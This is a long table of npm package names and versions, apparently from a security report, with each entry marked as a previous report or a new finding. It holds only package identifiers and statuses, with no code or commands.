| @nstudio/focus@20.0.6 | @nstudio | focus | 20.0.6 | PREVIOUS REPORT |
| @nstudio/nativescript-checkbox@2.0.6 | @nstudio | nativescript-checkbox | 2.0.6 | PREVIOUS REPORT |
| @nstudio/nativescript-checkbox@2.0.7 | @nstudio | nativescript-checkbox | 2.0.7 | PREVIOUS REPORT |
| @nstudio/nativescript-checkbox@2.0.8 | @nstudio | nativescript-checkbox | 2.0.8 | PREVIOUS REPORT |
| @nstudio/nativescript-checkbox@2.0.9 | @nstudio | nativescript-checkbox | 2.0.9 | PREVIOUS REPORT |
| @nstudio/nativescript-loading-indicator@5.0.1 | @nstudio | nativescript-loading-indicator | 5.0.1 | PREVIOUS REPORT |
| @nstudio/nativescript-loading-indicator@5.0.2 | @nstudio | nativescript-loading-indicator | 5.0.2 | PREVIOUS REPORT |
| @nstudio/nativescript-loading-indicator@5.0.3 | @nstudio | nativescript-loading-indicator | 5.0.3 | PREVIOUS REPORT |
| @nstudio/nativescript-loading-indicator@5.0.4 | @nstudio | nativescript-loading-indicator | 5.0.4 | PREVIOUS REPORT |
| @nstudio/ui-collectionview@5.1.11 | @nstudio | ui-collectionview | 5.1.11 | PREVIOUS REPORT |
| @nstudio/ui-collectionview@5.1.12 | @nstudio | ui-collectionview | 5.1.12 | PREVIOUS REPORT |
| @nstudio/ui-collectionview@5.1.13 | @nstudio | ui-collectionview | 5.1.13 | PREVIOUS REPORT |
| @nstudio/ui-collectionview@5.1.14 | @nstudio | ui-collectionview | 5.1.14 | PREVIOUS REPORT |
| @nstudio/web-angular@20.0.4 | @nstudio | web-angular | 20.0.4 | PREVIOUS REPORT |
| @nstudio/web@20.0.4 | @nstudio | web | 20.0.4 | PREVIOUS REPORT |
| @nstudio/xplat-utils@20.0.5 | @nstudio | xplat-utils | 20.0.5 | PREVIOUS REPORT |
| @nstudio/xplat-utils@20.0.6 | @nstudio | xplat-utils | 20.0.6 | PREVIOUS REPORT |
| @nstudio/xplat-utils@20.0.7 | @nstudio | xplat-utils | 20.0.7 | PREVIOUS REPORT |
| @nstudio/xplat@20.0.5 | @nstudio | xplat | 20.0.5 | PREVIOUS REPORT |
| @nstudio/xplat@20.0.6 | @nstudio | xplat | 20.0.6 | PREVIOUS REPORT |
| @nstudio/xplat@20.0.7 | @nstudio | xplat | 20.0.7 | PREVIOUS REPORT |
| @operato/board@9.0.35 | @operato | board | 9.0.35 | PREVIOUS REPORT |
| @operato/board@9.0.36 | @operato | board | 9.0.36 | PREVIOUS REPORT |
| @operato/board@9.0.37 | @operato | board | 9.0.37 | PREVIOUS REPORT |
| @operato/board@9.0.38 | @operato | board | 9.0.38 | PREVIOUS REPORT |
| @operato/board@9.0.39 | @operato | board | 9.0.39 | PREVIOUS REPORT |
| @operato/board@9.0.40 | @operato | board | 9.0.40 | PREVIOUS REPORT |
| @operato/board@9.0.41 | @operato | board | 9.0.41 | PREVIOUS REPORT |
| @operato/board@9.0.42 | @operato | board | 9.0.42 | PREVIOUS REPORT |
| @operato/board@9.0.43 | @operato | board | 9.0.43 | PREVIOUS REPORT |
| @operato/board@9.0.44 | @operato | board | 9.0.44 | PREVIOUS REPORT |
| @operato/board@9.0.45 | @operato | board | 9.0.45 | PREVIOUS REPORT |
| @operato/board@9.0.46 | @operato | board | 9.0.46 | PREVIOUS REPORT |
| @operato/board@9.0.47 | @operato | board | 9.0.47 | PREVIOUS REPORT |
| @operato/board@9.0.48 | @operato | board | 9.0.48 | PREVIOUS REPORT |
| @operato/board@9.0.49 | @operato | board | 9.0.49 | PREVIOUS REPORT |
| @operato/board@9.0.50 | @operato | board | 9.0.50 | PREVIOUS REPORT |
| @operato/board@9.0.51 | @operato | board | 9.0.51 | PREVIOUS REPORT |
| @operato/data-grist@9.0.29 | @operato | data-grist | 9.0.29 | PREVIOUS REPORT |
| @operato/data-grist@9.0.35 | @operato | data-grist | 9.0.35 | PREVIOUS REPORT |
| @operato/data-grist@9.0.36 | @operato | data-grist | 9.0.36 | PREVIOUS REPORT |
| @operato/data-grist@9.0.37 | @operato | data-grist | 9.0.37 | PREVIOUS REPORT |
| @operato/graphql@9.0.22 | @operato | graphql | 9.0.22 | PREVIOUS REPORT |
| @operato/graphql@9.0.35 | @operato | graphql | 9.0.35 | PREVIOUS REPORT |
| @operato/graphql@9.0.36 | @operato | graphql | 9.0.36 | PREVIOUS REPORT |
| @operato/graphql@9.0.37 | @operato | graphql | 9.0.37 | PREVIOUS REPORT |
| @operato/graphql@9.0.38 | @operato | graphql | 9.0.38 | PREVIOUS REPORT |
| @operato/graphql@9.0.39 | @operato | graphql | 9.0.39 | PREVIOUS REPORT |
| @operato/graphql@9.0.40 | @operato | graphql | 9.0.40 | PREVIOUS REPORT |
| @operato/graphql@9.0.41 | @operato | graphql | 9.0.41 | PREVIOUS REPORT |
| @operato/graphql@9.0.42 | @operato | graphql | 9.0.42 | PREVIOUS REPORT |
| @operato/graphql@9.0.43 | @operato | graphql | 9.0.43 | PREVIOUS REPORT |
| @operato/graphql@9.0.44 | @operato | graphql | 9.0.44 | PREVIOUS REPORT |
| @operato/graphql@9.0.45 | @operato | graphql | 9.0.45 | PREVIOUS REPORT |
| @operato/graphql@9.0.46 | @operato | graphql | 9.0.46 | PREVIOUS REPORT |
| @operato/graphql@9.0.47 | @operato | graphql | 9.0.47 | NEW FINDING |
| @operato/graphql@9.0.48 | @operato | graphql | 9.0.48 | NEW FINDING |
| @operato/graphql@9.0.49 | @operato | graphql | 9.0.49 | NEW FINDING |
| @operato/graphql@9.0.50 | @operato | graphql | 9.0.50 | NEW FINDING |
| @operato/graphql@9.0.51 | @operato | graphql | 9.0.51 | NEW FINDING |
| @operato/headroom@9.0.2 | @operato | headroom | 9.0.2 | PREVIOUS REPORT |
| @operato/headroom@9.0.35 | @operato | headroom | 9.0.35 | PREVIOUS REPORT |
| @operato/headroom@9.0.36 | @operato | headroom | 9.0.36 | PREVIOUS REPORT |
| @operato/headroom@9.0.37 | @operato | headroom | 9.0.37 | PREVIOUS REPORT |
| @operato/help@9.0.35 | @operato | help | 9.0.35 | PREVIOUS REPORT |
| @operato/help@9.0.36 | @operato | help | 9.0.36 | PREVIOUS REPORT |
| @operato/help@9.0.37 | @operato | help | 9.0.37 | PREVIOUS REPORT |
| @operato/help@9.0.38 | @operato | help | 9.0.38 | PREVIOUS REPORT |
| @operato/help@9.0.39 | @operato | help | 9.0.39 | PREVIOUS REPORT |
| @operato/help@9.0.40 | @operato | help | 9.0.40 | PREVIOUS REPORT |
| @operato/help@9.0.41 | @operato | help | 9.0.41 | PREVIOUS REPORT |
| @operato/help@9.0.42 | @operato | help | 9.0.42 | PREVIOUS REPORT |
| @operato/help@9.0.43 | @operato | help | 9.0.43 | PREVIOUS REPORT |
| @operato/help@9.0.44 | @operato | help | 9.0.44 | PREVIOUS REPORT |
| @operato/help@9.0.45 | @operato | help | 9.0.45 | PREVIOUS REPORT |
| @operato/help@9.0.46 | @operato | help | 9.0.46 | PREVIOUS REPORT |
| @operato/help@9.0.47 | @operato | help | 9.0.47 | NEW FINDING |
| @operato/help@9.0.48 | @operato | help | 9.0.48 | NEW FINDING |
| @operato/help@9.0.49 | @operato | help | 9.0.49 | NEW FINDING |
| @operato/help@9.0.50 | @operato | help | 9.0.50 | NEW FINDING |
| @operato/help@9.0.51 | @operato | help | 9.0.51 | NEW FINDING |
| @operato/i18n@9.0.35 | @operato | i18n | 9.0.35 | PREVIOUS REPORT |
| @operato/i18n@9.0.36 | @operato | i18n | 9.0.36 | PREVIOUS REPORT |
| @operato/i18n@9.0.37 | @operato | i18n | 9.0.37 | PREVIOUS REPORT |
| @operato/input@9.0.27 | @operato | input | 9.0.27 | PREVIOUS REPORT |
| @operato/input@9.0.35 | @operato | input | 9.0.35 | PREVIOUS REPORT |
| @operato/input@9.0.36 | @operato | input | 9.0.36 | PREVIOUS REPORT |
| @operato/input@9.0.37 | @operato | input | 9.0.37 | PREVIOUS REPORT |
| @operato/input@9.0.38 | @operato | input | 9.0.38 | PREVIOUS REPORT |
| @operato/input@9.0.39 | @operato | input | 9.0.39 | PREVIOUS REPORT |
| @operato/input@9.0.40 | @operato | input | 9.0.40 | PREVIOUS REPORT |
| @operato/input@9.0.41 | @operato | input | 9.0.41 | PREVIOUS REPORT |
| @operato/input@9.0.42 | @operato | input | 9.0.42 | PREVIOUS REPORT |
| @operato/input@9.0.43 | @operato | input | 9.0.43 | PREVIOUS REPORT |
| @operato/input@9.0.44 | @operato | input | 9.0.44 | PREVIOUS REPORT |
| @operato/input@9.0.45 | @operato | input | 9.0.45 | PREVIOUS REPORT |
| @operato/input@9.0.46 | @operato | input | 9.0.46 | PREVIOUS REPORT |
| @operato/input@9.0.47 | @operato | input | 9.0.47 | PREVIOUS REPORT |
| @operato/input@9.0.48 | @operato | input | 9.0.48 | PREVIOUS REPORT |
| @operato/layout@9.0.35 | @operato | layout | 9.0.35 | PREVIOUS REPORT |
| @operato/layout@9.0.36 | @operato | layout | 9.0.36 | PREVIOUS REPORT |
| @operato/layout@9.0.37 | @operato | layout | 9.0.37 | PREVIOUS REPORT |
| @operato/popup@9.0.22 | @operato | popup | 9.0.22 | PREVIOUS REPORT |
| @operato/popup@9.0.35 | @operato | popup | 9.0.35 | PREVIOUS REPORT |
| @operato/popup@9.0.36 | @operato | popup | 9.0.36 | PREVIOUS REPORT |
| @operato/popup@9.0.37 | @operato | popup | 9.0.37 | PREVIOUS REPORT |
| @operato/popup@9.0.38 | @operato | popup | 9.0.38 | PREVIOUS REPORT |
| @operato/popup@9.0.39 | @operato | popup | 9.0.39 | PREVIOUS REPORT |
| @operato/popup@9.0.40 | @operato | popup | 9.0.40 | PREVIOUS REPORT |
| @operato/popup@9.0.41 | @operato | popup | 9.0.41 | PREVIOUS REPORT |
| @operato/popup@9.0.42 | @operato | popup | 9.0.42 | PREVIOUS REPORT |
| @operato/popup@9.0.43 | @operato | popup | 9.0.43 | PREVIOUS REPORT |
| @operato/popup@9.0.44 | @operato | popup | 9.0.44 | PREVIOUS REPORT |
| @operato/popup@9.0.45 | @operato | popup | 9.0.45 | PREVIOUS REPORT |
| @operato/popup@9.0.46 | @operato | popup | 9.0.46 | PREVIOUS REPORT |
| @operato/popup@9.0.47 | @operato | popup | 9.0.47 | NEW FINDING |
| @operato/popup@9.0.48 | @operato | popup | 9.0.48 | NEW FINDING |
| @operato/popup@9.0.49 | @operato | popup | 9.0.49 | PREVIOUS REPORT |
| @operato/popup@9.0.50 | @operato | popup | 9.0.50 | NEW FINDING |
| @operato/popup@9.0.51 | @operato | popup | 9.0.51 | NEW FINDING |
| @operato/pull-to-refresh@9.0.35 | @operato | pull-to-refresh | 9.0.35 | NEW FINDING |
| @operato/pull-to-refresh@9.0.36 | @operato | pull-to-refresh | 9.0.36 | PREVIOUS REPORT |
| @operato/pull-to-refresh@9.0.37 | @operato | pull-to-refresh | 9.0.37 | PREVIOUS REPORT |
| @operato/pull-to-refresh@9.0.38 | @operato | pull-to-refresh | 9.0.38 | PREVIOUS REPORT |
| @operato/pull-to-refresh@9.0.39 | @operato | pull-to-refresh | 9.0.39 | PREVIOUS REPORT |
| @operato/pull-to-refresh@9.0.40 | @operato | pull-to-refresh | 9.0.40 | PREVIOUS REPORT |
| @operato/pull-to-refresh@9.0.41 | @operato | pull-to-refresh | 9.0.41 | PREVIOUS REPORT |
| @operato/pull-to-refresh@9.0.42 | @operato | pull-to-refresh | 9.0.42 | PREVIOUS REPORT |
| @operato/pull-to-refresh@9.0.43 | @operato | pull-to-refresh | 9.0.43 | NEW FINDING |
| @operato/pull-to-refresh@9.0.44 | @operato | pull-to-refresh | 9.0.44 | NEW FINDING |
| @operato/pull-to-refresh@9.0.45 | @operato | pull-to-refresh | 9.0.45 | NEW FINDING |
| @operato/pull-to-refresh@9.0.46 | @operato | pull-to-refresh | 9.0.46 | NEW FINDING |
| @operato/pull-to-refresh@9.0.47 | @operato | pull-to-refresh | 9.0.47 | NEW FINDING |
| @operato/shell@9.0.22 | @operato | shell | 9.0.22 | PREVIOUS REPORT |
| @operato/shell@9.0.35 | @operato | shell | 9.0.35 | PREVIOUS REPORT |
| @operato/shell@9.0.36 | @operato | shell | 9.0.36 | PREVIOUS REPORT |
| @operato/shell@9.0.37 | @operato | shell | 9.0.37 | PREVIOUS REPORT |
| @operato/shell@9.0.38 | @operato | shell | 9.0.38 | PREVIOUS REPORT |
| @operato/shell@9.0.39 | @operato | shell | 9.0.39 | PREVIOUS REPORT |
| @operato/styles@9.0.2 | @operato | styles | 9.0.2 | PREVIOUS REPORT |
| @operato/styles@9.0.35 | @operato | styles | 9.0.35 | PREVIOUS REPORT |
| @operato/styles@9.0.36 | @operato | styles | 9.0.36 | PREVIOUS REPORT |
| @operato/styles@9.0.37 | @operato | styles | 9.0.37 | PREVIOUS REPORT |
| @operato/utils@9.0.22 | @operato | utils | 9.0.22 | PREVIOUS REPORT |
| @operato/utils@9.0.35 | @operato | utils | 9.0.35 | PREVIOUS REPORT |
| @operato/utils@9.0.36 | @operato | utils | 9.0.36 | PREVIOUS REPORT |
| @operato/utils@9.0.37 | @operato | utils | 9.0.37 | PREVIOUS REPORT |
| @operato/utils@9.0.38 | @operato | utils | 9.0.38 | PREVIOUS REPORT |
| @operato/utils@9.0.39 | @operato | utils | 9.0.39 | PREVIOUS REPORT |
| @operato/utils@9.0.40 | @operato | utils | 9.0.40 | PREVIOUS REPORT |
| @operato/utils@9.0.41 | @operato | utils | 9.0.41 | PREVIOUS REPORT |
| @operato/utils@9.0.42 | @operato | utils | 9.0.42 | PREVIOUS REPORT |
| @operato/utils@9.0.43 | @operato | utils | 9.0.43 | PREVIOUS REPORT |
| @operato/utils@9.0.44 | @operato | utils | 9.0.44 | PREVIOUS REPORT |
| @operato/utils@9.0.45 | @operato | utils | 9.0.45 | PREVIOUS REPORT |
| @operato/utils@9.0.46 | @operato | utils | 9.0.46 | PREVIOUS REPORT |
| @operato/utils@9.0.47 | @operato | utils | 9.0.47 | PREVIOUS REPORT |
| @operato/utils@9.0.48 | @operato | utils | 9.0.48 | NEW FINDING |
| @operato/utils@9.0.49 | @operato | utils | 9.0.49 | PREVIOUS REPORT |
| @operato/utils@9.0.50 | @operato | utils | 9.0.50 | PREVIOUS REPORT |
| @operato/utils@9.0.51 | @operato | utils | 9.0.51 | PREVIOUS REPORT |
| @rxap/ngx-bootstrap@19.0.3 | @rxap | ngx-bootstrap | 19.0.3 | PREVIOUS REPORT |
| @rxap/ngx-bootstrap@19.0.4 | @rxap | ngx-bootstrap | 19.0.4 | PREVIOUS REPORT |
| @teriyakibomb/ember-velcro@2.2.1 | @teriyakibomb | ember-velcro | 2.2.1 | NEW FINDING |
| @teselagen/bio-parsers@0.4.30 | @teselagen | bio-parsers | 0.4.30 | PREVIOUS REPORT |
| @teselagen/bounce-loader@0.3.16 | @teselagen | bounce-loader | 0.3.16 | PREVIOUS REPORT |
| @teselagen/bounce-loader@0.3.17 | @teselagen | bounce-loader | 0.3.17 | PREVIOUS REPORT |
| @teselagen/file-utils@0.3.22 | @teselagen | file-utils | 0.3.22 | PREVIOUS REPORT |
| @teselagen/liquibase-tools@0.4.1 | @teselagen | liquibase-tools | 0.4.1 | PREVIOUS REPORT |
| @teselagen/ove@0.7.40 | @teselagen | ove | 0.7.40 | PREVIOUS REPORT |
| @teselagen/range-utils@0.3.14 | @teselagen | range-utils | 0.3.14 | PREVIOUS REPORT |
| @teselagen/range-utils@0.3.15 | @teselagen | range-utils | 0.3.15 | PREVIOUS REPORT |
| @teselagen/react-list@0.8.19 | @teselagen | react-list | 0.8.19 | PREVIOUS REPORT |
| @teselagen/react-list@0.8.20 | @teselagen | react-list | 0.8.20 | PREVIOUS REPORT |
| @teselagen/react-table@6.10.19 | @teselagen | react-table | 6.10.19 | PREVIOUS REPORT |
| @teselagen/react-table@6.10.20 | @teselagen | react-table | 6.10.20 | PREVIOUS REPORT |
| @teselagen/react-table@6.10.22 | @teselagen | react-table | 6.10.22 | PREVIOUS REPORT |
| @teselagen/sequence-utils@0.3.34 | @teselagen | sequence-utils | 0.3.34 | PREVIOUS REPORT |
| @teselagen/ui@0.9.10 | @teselagen | ui | 0.9.10 | PREVIOUS REPORT |
| @thangved/callback-window@1.1.4 | @thangved | callback-window | 1.1.4 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.42 | @things-factory | attachment-base | 9.0.42 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.43 | @things-factory | attachment-base | 9.0.43 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.44 | @things-factory | attachment-base | 9.0.44 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.45 | @things-factory | attachment-base | 9.0.45 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.46 | @things-factory | attachment-base | 9.0.46 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.47 | @things-factory | attachment-base | 9.0.47 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.48 | @things-factory | attachment-base | 9.0.48 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.49 | @things-factory | attachment-base | 9.0.49 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.50 | @things-factory | attachment-base | 9.0.50 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.51 | @things-factory | attachment-base | 9.0.51 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.52 | @things-factory | attachment-base | 9.0.52 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.53 | @things-factory | attachment-base | 9.0.53 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.54 | @things-factory | attachment-base | 9.0.54 | PREVIOUS REPORT |
| @things-factory/attachment-base@9.0.55 | @things-factory | attachment-base | 9.0.55 | PREVIOUS REPORT |
| @things-factory/auth-base@9.0.42 | @things-factory | auth-base | 9.0.42 | PREVIOUS REPORT |
| @things-factory/auth-base@9.0.43 | @things-factory | auth-base | 9.0.43 | PREVIOUS REPORT |
| @things-factory/auth-base@9.0.44 | @things-factory | auth-base | 9.0.44 | PREVIOUS REPORT |
| @things-factory/auth-base@9.0.45 | @things-factory | auth-base | 9.0.45 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.42 | @things-factory | email-base | 9.0.42 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.43 | @things-factory | email-base | 9.0.43 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.44 | @things-factory | email-base | 9.0.44 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.45 | @things-factory | email-base | 9.0.45 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.46 | @things-factory | email-base | 9.0.46 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.47 | @things-factory | email-base | 9.0.47 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.48 | @things-factory | email-base | 9.0.48 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.49 | @things-factory | email-base | 9.0.49 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.50 | @things-factory | email-base | 9.0.50 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.51 | @things-factory | email-base | 9.0.51 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.52 | @things-factory | email-base | 9.0.52 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.53 | @things-factory | email-base | 9.0.53 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.54 | @things-factory | email-base | 9.0.54 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.55 | @things-factory | email-base | 9.0.55 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.56 | @things-factory | email-base | 9.0.56 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.57 | @things-factory | email-base | 9.0.57 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.58 | @things-factory | email-base | 9.0.58 | PREVIOUS REPORT |
| @things-factory/email-base@9.0.59 | @things-factory | email-base | 9.0.59 | PREVIOUS REPORT |
| @things-factory/env@9.0.42 | @things-factory | env | 9.0.42 | PREVIOUS REPORT |
| @things-factory/env@9.0.43 | @things-factory | env | 9.0.43 | PREVIOUS REPORT |
| @things-factory/env@9.0.44 | @things-factory | env | 9.0.44 | PREVIOUS REPORT |
| @things-factory/env@9.0.45 | @things-factory | env | 9.0.45 | PREVIOUS REPORT |
| @things-factory/integration-base@9.0.42 | @things-factory | integration-base | 9.0.42 | PREVIOUS REPORT |
| @things-factory/integration-base@9.0.43 | @things-factory | integration-base | 9.0.43 | PREVIOUS REPORT |
| @things-factory/integration-base@9.0.44 | @things-factory | integration-base | 9.0.44 | PREVIOUS REPORT |
| @things-factory/integration-base@9.0.45 | @things-factory | integration-base | 9.0.45 | PREVIOUS REPORT |
| @things-factory/integration-marketplace@9.0.43 | @things-factory | integration-marketplace | 9.0.43 | PREVIOUS REPORT |
| @things-factory/integration-marketplace@9.0.44 | @things-factory | integration-marketplace | 9.0.44 | PREVIOUS REPORT |
| @things-factory/integration-marketplace@9.0.45 | @things-factory | integration-marketplace | 9.0.45 | PREVIOUS REPORT |
| @things-factory/shell@9.0.42 | @things-factory | shell | 9.0.42 | PREVIOUS REPORT |
| @things-factory/shell@9.0.43 | @things-factory | shell | 9.0.43 | PREVIOUS REPORT |
| @things-factory/shell@9.0.44 | @things-factory | shell | 9.0.44 | PREVIOUS REPORT |
@things-factory/shell@9.0.45@things-factoryshell9.0.45PREVIOUS REPORT
@tnf-dev/api@1.0.8@tnf-devapi1.0.8PREVIOUS REPORT
@tnf-dev/core@1.0.8@tnf-devcore1.0.8PREVIOUS REPORT
@tnf-dev/js@1.0.8@tnf-devjs1.0.8PREVIOUS REPORT
@tnf-dev/mui@1.0.8@tnf-devmui1.0.8PREVIOUS REPORT
@tnf-dev/react@1.0.8@tnf-devreact1.0.8PREVIOUS REPORT
@ui-ux-gang/devextreme-angular-rpk@24.1.7@ui-ux-gangdevextreme-angular-rpk24.1.7PREVIOUS REPORT
@yoobic/design-system@6.5.17@yoobicdesign-system6.5.17PREVIOUS REPORT
@yoobic/jpeg-camera-es6@1.0.13@yoobicjpeg-camera-es61.0.13PREVIOUS REPORT
@yoobic/yobi@8.7.53@yoobicyobi8.7.53PREVIOUS REPORT
airchief@0.3.1 airchief0.3.1PREVIOUS REPORT
airpilot@0.8.8 airpilot0.8.8PREVIOUS REPORT
angulartics2@14.1.1 angulartics214.1.1PREVIOUS REPORT
angulartics2@14.1.2 angulartics214.1.2PREVIOUS REPORT
another-shai@1.0.1 another-shai1.0.1PREVIOUS REPORT
browser-webdriver-downloader@3.0.8 browser-webdriver-downloader3.0.8PREVIOUS REPORT
capacitor-notificationhandler@0.0.2 capacitor-notificationhandler0.0.2PREVIOUS REPORT
capacitor-notificationhandler@0.0.3 capacitor-notificationhandler0.0.3PREVIOUS REPORT
capacitor-plugin-healthapp@0.0.2 capacitor-plugin-healthapp0.0.2PREVIOUS REPORT
capacitor-plugin-healthapp@0.0.3 capacitor-plugin-healthapp0.0.3PREVIOUS REPORT
capacitor-plugin-ihealth@1.1.8 capacitor-plugin-ihealth1.1.8PREVIOUS REPORT
capacitor-plugin-ihealth@1.1.9 capacitor-plugin-ihealth1.1.9PREVIOUS REPORT
capacitor-plugin-vonage@1.0.2 capacitor-plugin-vonage1.0.2PREVIOUS REPORT
capacitor-plugin-vonage@1.0.3 capacitor-plugin-vonage1.0.3PREVIOUS REPORT
capacitorandroidpermissions@0.0.4 capacitorandroidpermissions0.0.4PREVIOUS REPORT
capacitorandroidpermissions@0.0.5 capacitorandroidpermissions0.0.5PREVIOUS REPORT
config-cordova@0.8.5 config-cordova0.8.5PREVIOUS REPORT
cordova-plugin-voxeet2@1.0.24 cordova-plugin-voxeet21.0.24PREVIOUS REPORT
cordova-voxeet@1.0.32 cordova-voxeet1.0.32PREVIOUS REPORT
create-hest-app@0.1.9 create-hest-app0.1.9PREVIOUS REPORT
db-evo@1.1.4 db-evo1.1.4PREVIOUS REPORT
db-evo@1.1.5 db-evo1.1.5PREVIOUS REPORT
devextreme-angular-rpk@21.2.8 devextreme-angular-rpk21.2.8PREVIOUS REPORT
ember-browser-services@5.0.2 ember-browser-services5.0.2PREVIOUS REPORT
ember-browser-services@5.0.3 ember-browser-services5.0.3PREVIOUS REPORT
ember-headless-form-yup@1.0.1 ember-headless-form-yup1.0.1PREVIOUS REPORT
ember-headless-form@1.1.2 ember-headless-form1.1.2PREVIOUS REPORT
ember-headless-form@1.1.3 ember-headless-form1.1.3PREVIOUS REPORT
ember-headless-table@2.1.5 ember-headless-table2.1.5PREVIOUS REPORT
ember-headless-table@2.1.6 ember-headless-table2.1.6PREVIOUS REPORT
ember-url-hash-polyfill@1.0.12 ember-url-hash-polyfill1.0.12PREVIOUS REPORT
ember-url-hash-polyfill@1.0.13 ember-url-hash-polyfill1.0.13PREVIOUS REPORT
ember-velcro@2.2.1 ember-velcro2.2.1PREVIOUS REPORT
ember-velcro@2.2.2 ember-velcro2.2.2PREVIOUS REPORT
encounter-playground@0.0.2 encounter-playground0.0.2PREVIOUS REPORT
encounter-playground@0.0.3 encounter-playground0.0.3PREVIOUS REPORT
encounter-playground@0.0.4 encounter-playground0.0.4PREVIOUS REPORT
encounter-playground@0.0.5 encounter-playground0.0.5PREVIOUS REPORT
eslint-config-crowdstrike-node@4.0.3 eslint-config-crowdstrike-node4.0.3PREVIOUS REPORT
eslint-config-crowdstrike-node@4.0.4 eslint-config-crowdstrike-node4.0.4PREVIOUS REPORT
eslint-config-crowdstrike@11.0.2 eslint-config-crowdstrike11.0.2PREVIOUS REPORT
eslint-config-crowdstrike@11.0.3 eslint-config-crowdstrike11.0.3PREVIOUS REPORT
eslint-config-teselagen@6.1.7 eslint-config-teselagen6.1.7PREVIOUS REPORT
eslint-config-teselagen@6.1.8 eslint-config-teselagen6.1.8PREVIOUS REPORT
globalize-rpk@1.7.4 globalize-rpk1.7.4PREVIOUS REPORT
graphql-sequelize-teselagen@5.3.8 graphql-sequelize-teselagen5.3.8PREVIOUS REPORT
graphql-sequelize-teselagen@5.3.9 graphql-sequelize-teselagen5.3.9PREVIOUS REPORT
html-to-base64-image@1.0.2 html-to-base64-image1.0.2PREVIOUS REPORT
json-rules-engine-simplified@0.2.1 json-rules-engine-simplified0.2.1PREVIOUS REPORT
json-rules-engine-simplified@0.2.4 json-rules-engine-simplified0.2.4PREVIOUS REPORT
jumpgate@0.0.2 jumpgate0.0.2PREVIOUS REPORT
koa2-swagger-ui@5.11.1 koa2-swagger-ui5.11.1PREVIOUS REPORT
koa2-swagger-ui@5.11.2 koa2-swagger-ui5.11.2PREVIOUS REPORT
mcfly-semantic-release@1.3.1 mcfly-semantic-release1.3.1PREVIOUS REPORT
mcp-knowledge-base@0.0.2 mcp-knowledge-base0.0.2PREVIOUS REPORT
mcp-knowledge-graph@1.2.1 mcp-knowledge-graph1.2.1PREVIOUS REPORT
mobioffice-cli@1.0.3 mobioffice-cli1.0.3PREVIOUS REPORT
monorepo-next@13.0.1 monorepo-next13.0.1PREVIOUS REPORT
monorepo-next@13.0.2 monorepo-next13.0.2PREVIOUS REPORT
mstate-angular@0.4.4 mstate-angular0.4.4PREVIOUS REPORT
mstate-cli@0.4.7 mstate-cli0.4.7PREVIOUS REPORT
mstate-dev-react@1.1.1 mstate-dev-react1.1.1PREVIOUS REPORT
mstate-react@1.6.5 mstate-react1.6.5PREVIOUS REPORT
ng2-file-upload@7.0.2 ng2-file-upload7.0.2PREVIOUS REPORT
ng2-file-upload@7.0.3 ng2-file-upload7.0.3PREVIOUS REPORT
ng2-file-upload@8.0.1 ng2-file-upload8.0.1PREVIOUS REPORT
ng2-file-upload@8.0.2 ng2-file-upload8.0.2PREVIOUS REPORT
ng2-file-upload@8.0.3 ng2-file-upload8.0.3PREVIOUS REPORT
ng2-file-upload@9.0.1 ng2-file-upload9.0.1PREVIOUS REPORT
ngx-bootstrap@18.1.4 ngx-bootstrap18.1.4PREVIOUS REPORT
ngx-bootstrap@19.0.3 ngx-bootstrap19.0.3PREVIOUS REPORT
ngx-bootstrap@19.0.4 ngx-bootstrap19.0.4PREVIOUS REPORT
ngx-bootstrap@20.0.3 ngx-bootstrap20.0.3PREVIOUS REPORT
ngx-bootstrap@20.0.4 ngx-bootstrap20.0.4PREVIOUS REPORT
ngx-bootstrap@20.0.5 ngx-bootstrap20.0.5PREVIOUS REPORT
ngx-color@10.0.1 ngx-color10.0.1PREVIOUS REPORT
ngx-color@10.0.2 ngx-color10.0.2PREVIOUS REPORT
ngx-toastr@19.0.1 ngx-toastr19.0.1PREVIOUS REPORT
ngx-toastr@19.0.2 ngx-toastr19.0.2PREVIOUS REPORT
ngx-trend@8.0.1 ngx-trend8.0.1PREVIOUS REPORT
ngx-ws@1.1.5 ngx-ws1.1.5PREVIOUS REPORT
ngx-ws@1.1.6 ngx-ws1.1.6PREVIOUS REPORT
oradm-to-gql@35.0.14 oradm-to-gql35.0.14PREVIOUS REPORT
oradm-to-gql@35.0.15 oradm-to-gql35.0.15PREVIOUS REPORT
oradm-to-sqlz@1.1.2 oradm-to-sqlz1.1.2PREVIOUS REPORT
ove-auto-annotate@0.0.10 ove-auto-annotate0.0.10PREVIOUS REPORT
ove-auto-annotate@0.0.9 ove-auto-annotate0.0.9PREVIOUS REPORT
pm2-gelf-json@1.0.4 pm2-gelf-json1.0.4PREVIOUS REPORT
pm2-gelf-json@1.0.5 pm2-gelf-json1.0.5PREVIOUS REPORT
printjs-rpk@1.6.1 printjs-rpk1.6.1PREVIOUS REPORT
react-complaint-image@0.0.32 react-complaint-image0.0.32PREVIOUS REPORT
react-complaint-image@0.0.35 react-complaint-image0.0.35PREVIOUS REPORT
